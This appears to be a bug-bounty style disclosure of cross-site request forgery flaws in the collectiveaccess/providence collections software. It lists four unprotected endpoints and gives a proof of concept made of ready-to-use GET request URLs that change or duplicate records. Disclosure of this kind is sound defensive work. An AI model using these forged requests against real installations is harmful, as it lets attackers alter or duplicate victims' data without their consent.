Cross-Site Request Forgery (CSRF) in collectiveaccess/providence
Sep 26th 2021
I have found more endpoints which allow edit/duplicate were not protected from CSRF, the following endpoints are:
1: Edit Global Value in Pawtucket.
2: Change object type.
3: Duplicate object.
4: Duplicate items in the set and add to another set.
Proof of Concept
Via GET requests: 1. URL]/providence/index.php/manage/Pawtucket/saveGlobalValues?_formName=globalValuesForm&form_timestamp=1632635941&hours_of_operation=ABC 2. [URL]/providence/index.php/editor/objects/ObjectEditor/ChangeType?_formName=caChangeTypeForm&form_timestamp=1632633565&type_id=23&object_id=7 3. [URL]/providence/index.php/editor/objects/ObjectEditor/Edit?_formName=DuplicateItemForm&object_id=34&mode=dupe 4. [URL]/providence/index.php/manage/sets/SetEditor/DuplicateItems?_formName=caDupeSetItemsForm&form_timestamp=1632634975&setForDupes=new&set_id=2[
Compromise on the integrity and availability of objects.